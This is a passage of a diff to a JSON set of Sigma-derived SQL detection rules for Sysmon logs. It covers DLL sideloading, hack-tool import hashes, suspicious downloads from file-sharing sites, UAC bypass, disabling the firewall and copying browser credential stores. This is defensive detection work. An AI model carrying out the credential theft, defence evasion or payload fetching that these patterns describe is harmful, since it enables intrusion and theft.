by wmiprvse as parent as used by TA505 malicious documents", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": 
"X__Junior (Nextron Systems)", "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'mshta.exe'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Renamed Whoami Execution", - "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", - "status": "test", - "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT 
* FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_whoami.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "UAC Bypass via ICMLuaUtil", - "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', 
'1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', 
'38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash 
LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": 
"573df571-a223-43bc-846e-3f98da481eca", + "status": "experimental", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] 
ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE 
'%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "description": "Detects potential suspicious winget package installation from a suspicious source.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND 
(CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' 
ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' 